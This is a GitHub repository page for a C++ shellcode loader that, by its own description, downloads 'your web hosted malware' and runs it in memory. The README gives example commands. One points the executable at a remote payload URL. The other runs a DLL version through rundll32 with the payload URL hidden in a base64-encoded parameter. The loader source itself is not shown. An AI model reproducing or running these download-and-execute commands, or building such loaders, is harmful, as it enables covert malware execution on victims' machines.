Skip to content

ryansisco/RyansRemoteLoader

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Ryan's Remote Loader

Custom shellcode loader written in C++. This will grab your web hosted malware and run it in memory.

This project is password protected at this time.

alt text

Examples:

RRL.exe will take the remote bin file as a parameter like: RRL.exe http://10.0.0.54/pwn.bin

This can also be run as a DLL using a base64 encoded parameter: rundll32.exe RRLDLL.dll,Driver aHR0cDovLzEwLjAuMC41NC9wd24uYmluCg==

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks